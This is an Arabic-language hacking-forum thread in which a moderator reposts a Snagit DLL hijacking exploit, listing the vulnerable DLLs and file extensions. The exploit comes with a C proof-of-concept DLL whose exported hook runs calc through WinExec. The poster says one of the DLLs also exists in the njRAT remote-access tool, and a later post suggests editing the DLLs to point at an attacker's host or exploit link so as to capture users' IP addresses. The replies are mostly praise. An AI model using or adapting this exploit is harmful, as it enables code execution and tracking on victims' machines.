1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : k!lwa s&rian ro0t | المشاهدات : 525 | الردود : 7
  1. k!lwa s&rian ro0t مراقب عآم

    الأنتساب:
    ‏3 أغسطس 2014
    المشاركات:
    743
    الإعجابات المتلقاة:
    1,235
    نقاط الجائزة:
    515
    الجنس:
    ذكر
    [​IMG]

    اليوم رح اطرح لكم ثغرة حلوة جدآ ...

    كود PHP:
    #####################################################################################################################

    #Title: Snagit DLL Hijacking Exploit (mfc90ara.dll - dwmapi.dll - mfc90loc.dll) 

    #Author: Dmar al3noOoz  ( Ù�ارب Ø§Ù�صر Ø§Ø®Ù�Ù�Ù�ا Ù�Ù� Ø³Ù�رÙ�ا ) 

    #Mail: wafee_s@hotmail.com

    #Software Link: http://snagit.en.softonic.com/   

    #Version: All

    #Tested on: Windows XP 

    #####################################################################################################################
    [*] Vulnerable extensions:

     /.
    snagacc  /.snagprof  /.snag

    [*] Vulnerable Dlls:

    mfc90ara.dll dwmapi.dll mfc90loc.dll

    ---------------------------------------------------------------------------------------------------------------------

    #include <windows.h>
    #define DllExport __declspec (dllexport)
     
    DllExport void hook_startup() { exp(); }
     
    int exp()
    {
      
    WinExec("calc"0);
      exit(
    0);
      return 
    0;
    }


    -=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=-
    Greetz-=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=-  

    -=- 
    v4-team.com Evil-Cod3r dmar hacker dr.Dmar Dmaral7roOob Ra7aLAlgnob Mr.law Alkeasr20 Mr.black Cyber-CrysTaL    -=-  

    -=-                                       
    HiTMaN Team 19vr RootAl3noz all Friend Exploit4Arab.com                            -=-  

    -=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-

    طيب في ناس تقول مافهمنا شي ؟

    رح افصلك الثغرة بسناني هههههههههههههههه

    الثغرة ثغرة في برنامج Snagit للتصوير والكل يعرف هذا البرنامج واغلب الهكرز يستخدمونه ..

    ثغرة في مكتبة dll في برنامج سناجيت ..

    وكما موضح فوق
    في مكتبات الـ dll التالية .
    mfc90ara.dll
    dwmapi.dll
    mfc90loc.dll ,,,,,


    المكتبة 2 موجودة في برنامج الإختراق Njrat

    يعني يمكنك استغلالها في نجرات ايضآآ ..



    في امان الله
     
  2. TeePlow V • I • P

    الأنتساب:
    ‏12 مارس 2014
    المشاركات:
    401
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:
    50
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    Facebook:
    رد: Snagit DLL Hijacking Exploit (mfc90ara.dll - dwmapi.dll - mfc90loc.dll)

    السلام عليكم
    بارك الله فيك على الطرح
    لاكن لو توضح اكثر ما عمل الثغرة
     
  3. ƁƛƬ MƛƝ V • I • P

    الأنتساب:
    ‏16 يوليو 2014
    المشاركات:
    376
    الإعجابات المتلقاة:
    13
    نقاط الجائزة:
    50
    الوظيفة:
    web development
    اللغة البرمجية:
    C#
    Facebook:
    رد: Snagit DLL Hijacking Exploit (mfc90ara.dll - dwmapi.dll - mfc90loc.dll)

    شرح رائع يامبدع

    لكن لو توضح طريقة الإستغلال يكون أفضل
     
  4. ~.O M A R.~ Developer

    الأنتساب:
    ‏16 يوليو 2012
    المشاركات:
    62
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الإقامة:
    الأردن
    رد: Snagit DLL Hijacking Exploit (mfc90ara.dll - dwmapi.dll - mfc90loc.dll)

    مشكور يالغالي الثغره قديمه بتاريخ 2012 حق دمار العنزي
     
  5. k!lwa s&rian ro0t مراقب عآم

    الأنتساب:
    ‏3 أغسطس 2014
    المشاركات:
    743
    الإعجابات المتلقاة:
    1,235
    نقاط الجائزة:
    515
    الجنس:
    ذكر
    رد: Snagit DLL Hijacking Exploit (mfc90ara.dll - dwmapi.dll - mfc90loc.dll)

    هذه الثغرة حق الأخ دمار العنزي ..

    صحيح هو اكتشفها ولكن ماوضح طريقة الأستغلال ..

    طيب رح اقول لكم ؟

    ^_^
    في هذه المتكبات ازا تغير فيها مالح تأثر عالبرنامج ^_^
    mfc90ara.dll
    dwmapi.dll
    mfc90loc.dll


    .....
    ازا تفتح مكتبة منهم حتلاقي بريد وحتلاقي موقع رسمي

    فيك تغير البريد لهوستك عندك او رابط استغلال وفيك تغير الموقع لموقع لديك حتى تجيب ايبيهات المستخدمين ..
    الثغرة خطيرة ياجماعة الخير ^_^

    وبارك الله فيكم جميعآ
     
  6. sєиɪσя нσssαм ★ Abu Nabil ★ V • I • P

    الأنتساب:
    ‏11 يوليو 2014
    المشاركات:
    202
    الإعجابات المتلقاة:
    8
    نقاط الجائزة:
    50
    الإقامة:
    فــ ـي قـ ـ لـ ـ و بــ كـم
    نظام التشغيل:
    windows 8.1
    اللغة البرمجية:
    Visual Basic
    رد: Snagit DLL Hijacking Exploit (mfc90ara.dll - dwmapi.dll - mfc90loc.dll)

    مآشآء الله عليك
    دآئمآ مبدع
    آستمر ولآ توقف
    ،،،
     
  7. MR.CAPTCHA Expert Developer ExpErt DeveloPer

    الأنتساب:
    ‏30 أغسطس 2014
    المشاركات:
    1,786
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    90
    الوظيفة:
    I.T Student
    الإقامة:
    IRAQ
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    C#
    Facebook:
    YouTube:
    رد: Snagit DLL Hijacking Exploit (mfc90ara.dll - dwmapi.dll - mfc90loc.dll)

    احسنت اخ رامي مبدع كالعادة
    {1!$8}
     
  8. Gaza-Dz إدارة الموقع

    الأنتساب:
    ‏26 مايو 2013
    المشاركات:
    1,837
    الإعجابات المتلقاة:
    104
    نقاط الجائزة:
    505
    الجنس:
    ذكر
    الوظيفة:
    DZ
    الإقامة:
    DZ
    نظام التشغيل:
    windows 8.1
    اللغة البرمجية:
    Visual Basic
    Facebook:
    رد: Snagit DLL Hijacking Exploit (mfc90ara.dll - dwmapi.dll - mfc90loc.dll)

    بوركت اخي رامي علي التغرة
    في انتظار كل ماهو جديدك
     

مشاركة هذه الصفحة